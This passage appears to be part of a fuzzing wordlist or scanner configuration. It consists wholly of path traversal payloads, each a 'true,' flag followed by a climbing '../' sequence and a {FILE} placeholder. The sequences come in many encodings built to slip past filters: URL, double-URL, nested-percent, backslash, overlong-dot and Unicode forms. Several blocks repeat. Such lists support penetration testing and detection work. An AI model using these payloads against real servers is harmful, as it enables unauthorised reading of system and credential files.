"true,..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,..%%35%63{FILE}",
"true,..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,\\../{FILE}",
"true,\\../\\../{FILE}",
"true,\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
"true,/..\\{FILE}",
"true,/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
"true,.../{FILE}",
"true,.../.../{FILE}",
"true,.../.../.../{FILE}",
"true,.../.../.../.../{FILE}",
"true,.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../{FILE}",
"true,.../.../.../.../.../.../.../.../{FILE}",
"true,...\\{FILE}",
"true,...\\...\\{FILE}",
"true,...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
"true,..../{FILE}",
"true,..../..../{FILE}",
"true,..../..../..../{FILE}",
"true,..../..../..../..../{FILE}",
"true,..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../{FILE}",
"true,..../..../..../..../..../..../..../..../{FILE}",
"true,....\\{FILE}",
"true,....\\....\\{FILE}",
"true,....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
"true,........................................................................../{FILE}",
"true,........................................................................../../{FILE}",
"true,........................................................................../../../{FILE}",
"true,........................................................................../../../../{FILE}",
"true,........................................................................../../../../../{FILE}",
"true,........................................................................../../../../../../{FILE}",
"true,........................................................................../../../../../../../{FILE}",
"true,........................................................................../../../../../../../../{FILE}",
"true,..........................................................................\\{FILE}",
"true,..........................................................................\\..\\{FILE}",
"true,..........................................................................\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%u2215{FILE}",
"true,..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
"true,%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
"true,%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
"true,..%u2216{FILE}",
"true,..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
"true,..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
"true,..%uF025{FILE}",
"true,..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
"true,%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
